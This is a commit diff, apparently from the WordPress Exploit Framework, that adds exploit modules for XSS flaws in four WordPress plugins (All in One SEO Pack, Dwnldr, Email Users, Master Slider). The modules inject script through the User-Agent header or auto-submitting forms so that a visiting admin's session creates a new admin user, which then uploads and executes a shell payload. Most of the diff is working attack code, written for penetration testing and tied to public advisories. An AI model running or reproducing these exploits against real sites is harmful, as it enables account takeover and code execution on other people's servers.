Merged development into master

Author: rastating

Gemfile

@@ -1,12 +1,12 @@
 source 'https://rubygems.org'
-gem 'colorize', '>=0.7'
-gem 'mime-types', '>=3.0'
-gem 'nokogiri', '~>1.6.7'
+gem 'colorize', '>=0.8.1'
+gem 'mime-types', '>=3.1'
+gem 'nokogiri', '~>1.6.8'
 gem 'slop', '~>4.3'
-gem 'typhoeus', '~>1.0.1'
+gem 'typhoeus', '~>1.1.0'
 gem 'require_all', '~>1.3.3'
 gem 'rubyzip', '~>1.2'
 
 group :test do
-  gem 'rspec', '~>3.4'
+  gem 'rspec', '~>3.5'
 end

lib/wpxf/wordpress/fingerprint.rb

@@ -62,7 +62,7 @@ def check_plugin_version_from_readme(name, fixed = nil, introduced = nil)
   # @return [Symbol] :unknown, :vulnerable or :safe.
   def check_plugin_version_from_changelog(plugin_name, file_name, fixed = nil, introduced = nil)
     changelog = normalize_uri(wordpress_url_plugins, plugin_name, file_name)
-    check_version_from_custom_file(changelog, /=\s(\d\.\d(\.\d)?)\s=/, fixed, introduced)
+    check_version_from_custom_file(changelog, /=\s([\d\.]+)\s=/, fixed, introduced)
   end
 
   # Checks a custom file for a vulnerable version.

lib/wpxf/wordpress/xss.rb

@@ -11,6 +11,12 @@ module Wpxf::WordPress::Xss
   def initialize
     super
     @success = false
+    @info[:desc] = 'This module stores a script which will be executed when '\
+                   'an admin user visits the vulnerable page. Execution of the script '\
+                   'will create a new admin user which will be used to upload '\
+                   'and execute the selected payload in the context of the '\
+                   'web server.'
+
     register_options([
       StringOption.new(
         name: 'xss_host',

modules/exploits/all_in_one_seo_pack_xss_shell_upload.rb

@@ -0,0 +1,206 @@
+class Wpxf::Exploit::AllInOneSeoPackXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::Xss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'All in One SEO Pack <= 2.3.6.1 Stored XSS Shell Upload',
+      desc: %(
+              This module exploits a lack of HTTP header sanitization in
+              versions <= 2.3.6.1 of the All in One SEO Pack plugin which
+              allows unauthenticated users to store a script that will
+              create a new admin user and use the new credentials to upload
+              and execute a payload when an admin views the blocked bot logs.
+            ).strip,
+      author: [
+        'David Vaartjes',                 # Disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8538'],
+        ['URL', 'https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_all_in_one_seo_pack_wordpress_plugin.html']
+      ],
+      date: 'Jul 10 2016'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('all-in-one-seo-pack', '2.3.6.2')
+  end
+
+  def blocked_bots
+    [
+      'Abonti',
+      'aggregator',
+      'AhrefsBot',
+      'asterias',
+      'BDCbot',
+      'BLEXBot',
+      'BuiltBotTough',
+      'Bullseye',
+      'BunnySlippers',
+      'ca-crawler',
+      'CCBot',
+      'Cegbfeieh',
+      'CheeseBot',
+      'CherryPicker',
+      'CopyRightCheck',
+      'cosmos',
+      'Crescent',
+      'discobot',
+      'DittoSpyder',
+      'DotBot',
+      'Download Ninja',
+      'EasouSpider',
+      'EmailCollector',
+      'EmailSiphon',
+      'EmailWolf',
+      'EroCrawler',
+      'Exabot',
+      'ExtractorPro',
+      'Fasterfox',
+      'FeedBooster',
+      'Foobot',
+      'Genieo',
+      'grub-client',
+      'Harvest',
+      'hloader',
+      'httplib',
+      'HTTrack',
+      'humanlinks',
+      'ieautodiscovery',
+      'InfoNaviRobot',
+      'IstellaBot',
+      'Java/1.',
+      'JennyBot',
+      'k2spider',
+      'Kenjin Spider',
+      'Keyword Density/0.9',
+      'larbin',
+      'LexiBot',
+      'libWeb',
+      'libwww',
+      'LinkextractorPro',
+      'linko',
+      'LinkScan/8.1a Unix',
+      'LinkWalker',
+      'LNSpiderguy',
+      'lwp-trivial',
+      'magpie',
+      'Mata Hari',
+      'MaxPointCrawler',
+      'MegaIndex',
+      'Microsoft URL Control',
+      'MIIxpc',
+      'Mippin',
+      'Missigua Locator',
+      'Mister PiX',
+      'MJ12bot',
+      'moget',
+      'MSIECrawler',
+      'NetAnts',
+      'NICErsPRO',
+      'Niki-Bot',
+      'NPBot',
+      'Nutch',
+      'Offline Explorer',
+      'Openfind',
+      'panscient.com',
+      'PHP/5.{',
+      'ProPowerBot/2.14',
+      'ProWebWalker',
+      'Python-urllib',
+      'QueryN Metasearch',
+      'RepoMonkey',
+      'RMA',
+      'SemrushBot',
+      'SeznamBot',
+      'SISTRIX',
+      'sitecheck.Internetseer.com',
+      'SiteSnagger',
+      'SnapPreviewBot',
+      'Sogou',
+      'SpankBot',
+      'spanner',
+      'spbot',
+      'Spinn3r',
+      'suzuran',
+      'Szukacz/1.4',
+      'Teleport',
+      'Telesoft',
+      'The Intraformant',
+      'TheNomad',
+      'TightTwatBot',
+      'Titan',
+      'toCrawl/UrlDispatcher',
+      'True_Robot',
+      'turingos',
+      'TurnitinBot',
+      'UbiCrawler',
+      'UnisterBot',
+      'URLy Warning',
+      'VCI',
+      'WBSearchBot',
+      'Web Downloader/6.9',
+      'Web Image Collector',
+      'WebAuto',
+      'WebBandit',
+      'WebCopier',
+      'WebEnhancer',
+      'WebmasterWorldForumBot',
+      'WebReaper',
+      'WebSauger',
+      'Website Quester',
+      'Webster Pro',
+      'WebStripper',
+      'WebZip',
+      'Wotbox',
+      'wsr-agent',
+      'WWW-Collector-E',
+      'Xenu',
+      'Zao',
+      'Zeus',
+      'ZyBORG',
+      'coccoc',
+      'Incutio',
+      'lmspider',
+      'memoryBot',
+      'SemrushBot',
+      'serf',
+      'Unknown',
+      'uptime files'
+    ]
+  end
+
+  def store_script
+    emit_info 'Storing script...'
+    res = execute_get_request(
+      url: full_uri,
+      headers: {
+        'User-Agent' => "#{blocked_bots.sample}<script>#{xss_ascii_encoded_include_script}</script>"
+      }
+    )
+
+    if res.nil?
+      emit_error 'No response from the target'
+      return false
+    end
+
+    if res.code != 503
+      emit_warning "Server responded with code #{res.code}, expected 503"
+    end
+
+    true
+  end
+
+  def run
+    return false unless super
+    return false unless store_script
+
+    emit_success 'Script stored and will be executed when a user views the blocked bots log'
+    start_http_server
+
+    xss_shell_success
+  end
+end

modules/exploits/dwnldr_xss_shell_upload.rb

@@ -0,0 +1,56 @@
+class Wpxf::Exploit::DwnldrXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::Xss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Dwnldr 1.0 XSS Shell Upload',
+      author: [
+        'Rob Carr <rob[at]rastating.com>' # Disclosure + WPXF module
+      ],
+      references: [
+        ['WPVDB', '8556'],
+        ['URL', 'http://blog.rastating.com/dwnldr-1-0-stored-xss-disclosure']
+      ],
+      date: 'Jul 18 2016'
+    )
+
+    register_options([
+      StringOption.new(
+        name: 'attachment_link',
+        desc: 'The address of a valid attachment download link',
+        required: true
+      )
+    ])
+  end
+
+  def check
+    check_plugin_version_from_changelog('dwnldr', 'readme.txt', '1.01')
+  end
+
+  def run
+    return false unless super
+
+    emit_info 'Storing script...'
+    res = execute_get_request(
+      url: datastore['attachment_link'],
+      headers: { 'User-Agent' => "\"><script>#{xss_ascii_encoded_include_script}</script><\"" }
+    )
+
+    if res.nil?
+      emit_error 'No response from the target'
+      return false
+    end
+
+    if res.code != 200
+      emit_error "Server responded with code #{res.code}"
+      return false
+    end
+
+    emit_success 'Script stored and will be executed when a user views the download logs for the specified attachment.'
+    start_http_server
+
+    xss_shell_success
+  end
+end

modules/exploits/email_users_reflected_xss_shell_upload.rb

@@ -0,0 +1,38 @@
+class Wpxf::Exploit::EmailUsersReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Email Users <= 4.8.2 Reflected XSS Shell Upload',
+      author: [
+        'Yorick Koster',                  # Disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8549'],
+        ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_email_users_wordpress_plugin.html']
+      ],
+      date: 'Jul 12 2016'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('email-users', '4.8.3')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'admin.php')
+  end
+
+  def initial_script
+    %|<html><head></head><body><script>
+      #{js_post}
+      post('#{vulnerable_url}?page=mailusers-user-settings', {
+        page: '"><script>#{xss_ascii_encoded_include_script}<\\/script>'
+      });
+    </script></body></html>
+    |
+  end
+end

modules/exploits/master_slider_reflected_xss_shell_upload.rb

@@ -0,0 +1,39 @@
+class Wpxf::Exploit::MasterSliderReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Master Slider <= 2.7.1 Reflected XSS Shell Upload',
+      author: [
+        'Yorick Koster',                  # Disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8548'],
+        ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_master_slider_wordpress_plugin.html']
+      ],
+      date: 'Jul 12 2016'
+    )
+  end
+
+  def check
+    change_log = normalize_uri(wordpress_url_plugins, 'master-slider', 'README.txt')
+    check_version_from_custom_file(change_log, /Version\s([\d\.]+)\s/, '2.7.2')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'admin.php')
+  end
+
+  def initial_script
+    %|<html><head></head><body><script>
+      #{js_post}
+      post('#{vulnerable_url}?page=master-slider', {
+        page: '"><script>#{xss_ascii_encoded_include_script}<\\/script>'
+      });
+    </script></body></html>
+    |
+  end
+end